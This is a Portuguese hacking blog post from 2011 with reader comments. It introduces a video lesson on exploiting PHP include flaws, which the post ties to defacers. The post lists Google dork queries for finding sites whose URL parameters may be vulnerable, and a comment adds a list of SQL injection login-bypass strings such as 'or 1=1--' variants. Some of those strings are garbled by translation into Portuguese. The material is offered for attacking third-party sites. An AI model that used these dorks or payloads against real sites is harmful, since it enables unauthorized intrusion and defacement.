Bom, muita gente tem duvidas sobre PHP Injection, provavelmente a vulnerabilidade mais explorada por defacers.
A vulnerabilidade acontece por desconhecimento do webmaster, ou por distração, eles colocam ‘includes‘ para ajudar na criação de seu site sem fazer nenhuma verificação das ‘strings‘. Nesta video aula estarei mostrando como você pode explorar essa falha.
Autor: Rxt
Strings:
allinurl:”.php?page=”
allinurl:”.php?inc=”
allinurl:”.php?body=”
allinurl:”.php?main=”
allinurl:”.php?pag=”
allinurl:”.php?p=”
allinurl:”.php?content=”
allinurl:”.php?cont=”
allinurl:”.php?c=”
allinurl:”.php?meio=”
allinurl:”.php?x=”
allinurl:”.php?cat=”
allinurl:”.php?site=”
allinurl:”.php?m=”
allinurl:”.php?do=”
allinurl:”.php?x=”
allinurl:”.php?content=”
allinurl:”.php?pagina=”
allinurl:”.php?root=”
allinurl:”.php?include=”
allinurl:”.php?open=”
allinurl:”.php?visualizar=”
allinurl:”.php?conf=”
Loading ...
3 de janeiro de 2011 at 8:41 AM
Boa vídeo aulal, só faltou a lista de strings.
18 de janeiro de 2011 at 1:34 PM
=[ STRINGS PARA TER ACESSO ROOT ]=
b’ or ‘ 1=’
‘ or ’1
‘ or ‘|
‘ or ‘a’='a
‘ or ”=’
‘ or 1=1–
‘) or (‘a’='a
‘ or ’1′=’1
‘or’x'=’x
admin ‘ – -
‘ ou 0=0 –
“ou 0=0 –
ou 0=0 –
‘ ou 0=0 #
“ou 0=0 #
ou 0=0 #
‘ ou ‘ x’='x
“ou” x”=”x
‘) ou (‘ x’='x
‘ ou 1=1 –
“ou 1=1 –
ou 1=1 –
‘ ou a=a –
“ou” a”=”a
‘) ou (‘ a’='a
“) ou (“a”=”a
hi “ou” a”=”a
hi “ou 1=1 –
hi ‘ ou 1=1 –
hi ‘ ou ‘ a’='a
hi ‘) ou (‘ a’='a
10 de julho de 2011 at 7:36 PM
Olá.
O video foi removido, poderia upa-lo novamente?
Abraços
15 de julho de 2011 at 11:44 PM
Video Removido!